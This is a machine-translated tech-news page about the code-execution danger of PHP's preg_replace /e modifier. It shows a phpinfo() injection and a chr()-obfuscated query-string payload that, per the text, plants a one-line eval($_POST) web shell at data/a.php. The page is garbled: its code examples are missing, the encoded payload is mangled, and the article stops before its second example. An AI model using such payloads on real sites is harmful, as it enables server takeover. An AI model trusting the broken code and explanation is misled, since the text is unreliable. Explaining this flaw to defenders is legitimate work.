What do you need to pay attention to when using the preg_replace dangerous / e modifier in php 02/23 Update SLTechnology News&Howtos

What do you need to pay attention to when using the preg_replace dangerous / e modifier in php

2025-02-23 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >

Shulou(Shulou.com)06/03 Report--

This article is about what you need to pay attention to when using the preg_replace dangerous / e modifier in php. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

Preg_replace function prototype:

Mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])

Special note:

The / e modifier causes preg_replace () to treat the replacement parameter as PHP code (after the appropriate reverse reference has been replaced). Tip: make sure that replacement forms a legitimate PHP code string, otherwise PHP will report syntax parsing errors on lines that contain preg_replace ().

For example:

The copy code is as follows:

This capitalizes all HTML tags in the input string.

Security threat Analysis:

Usually subject parameters are generated by the client, which may construct malicious code, such as:

The copy code is as follows:

If we submit? h=phpinfo (), phpinfo () will be executed (using the / e modifier, preg_replace will execute the replacement parameter as PHP code).

What if we submit the following code?

? h=eval (chr 102,112,chr 117.chr 116.chr 115.chr 40.chr 102.chr 1111.chr 101.chr 101.chr 110) .chr 40 .chr 39 .chr 100.chr 97).

Chr (116) .chr (97) .chr (47) .chr (46) .chr (46) .chr (104) .chr (112) .chr (39) .chr (44) .chr (39) .chr (41) .chr (44) .chr (39) .chr (60).

Chr (63). Chr (112) .chr (32) .chr (101) .chr (118) .chr (97) .chr (108) .chr (40) .chr (36) .chr (95) .chr (80) .chr (79) .chr (83) .chr (84) .chr (91).

Chr (99) .chr (109) .chr (100) .chr (93) .chr (41) .chr (63) .chr (62) .chr (39) .chr (41). Chr (59))

The ciphertext corresponds to the plaintext: fputs (fopen (data/a.php,w),)

The result of execution is to generate an one-sentence Trojan file a.php in the / data/ directory.

Let's take another difficult example:

The copy code is as follows:

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.